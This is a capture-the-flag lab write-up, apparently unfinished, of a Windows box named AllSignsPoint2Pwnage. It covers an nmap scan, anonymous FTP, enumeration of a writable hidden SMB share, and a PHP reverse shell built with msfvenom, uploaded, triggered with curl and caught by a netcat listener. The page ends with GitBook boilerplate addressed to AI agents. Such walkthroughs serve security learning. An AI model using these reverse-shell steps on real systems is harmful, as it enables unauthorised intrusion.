> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/to-do/allsignspoint2pwnage.md).

# AllSignsPoint2Pwnage (WIP)

## Nmap

```
sudo nmap 10.10.54.102 -p- -sS -sV -Pn

Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5040/tcp  open  unknown
5900/tcp  open  vnc           VNC (protocol 3.8)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

First up checking FTP shows we can login with anonymous login. From here listing the contents only shows notice.txt.

![](/files/-MY03YPufw4u6qNY7UEg)

Viewing the contents we become aware of a hidden SMB share called 'images'. The notice also implies uploading is possible on the share.

![](/files/-MY03fKGJHajhcw8-vgE)

Checking for shares with smbclient.

```
smbclient -U '' -L \\\\10.10.54.102\\
```

![](/files/-MY04skATH5uliIDnww9)

We can then connect to the images$ share. List the contents and confirmd file upload with the `put` command using test.txt

![](/files/-MY053MOdaFP_dng6TjD)

Browsing to port 80 to check out the webserver we are presented with a slideshow. Using the contextual menu to save the images shows us the name of the image which matches that in the SMB share.

![](/files/-MY05qW1qC8OhMGF5_PM)

We can test if we can read the contents of test.txt to confirm we can execute uploaded files. We can try the /images/ directory as we known the share exists.

```
curl http://10.10.54.102/images/test.txt 
```

![](/files/-MY06FYpAEJLEeaWGUA4)

Knowing this works we can start to work towards getting a reverse shell. Checking information regarding the web server using Nikto shows it is powered by PHP.

![](/files/-MY06UYOXAEk1zf4WcCP)

Ideally we should create a PHP reverse shell and upload it to the SMB share. We can achieve this with msfvenom as shown below.

```
msfvenom -p php/reverse_php LHOST=10.14.3.108 LPORT=80 -f raw > phpreverseshell.php
```

Then upload the shell to the SMB share.

![](/files/-MY06w3ulIwpSCkqA3yq)

Open a `netcat` listener to the port specified in the payload.

```
sudo nc -lvp 80
```

Then execute the shell with curl.

```
curl http://10.10.54.102/images/phpreverseshell.php
```

Which connects our listener.

![](/files/-MY07_q6nhrEkFOlSQ7f)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/to-do/allsignspoint2pwnage.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
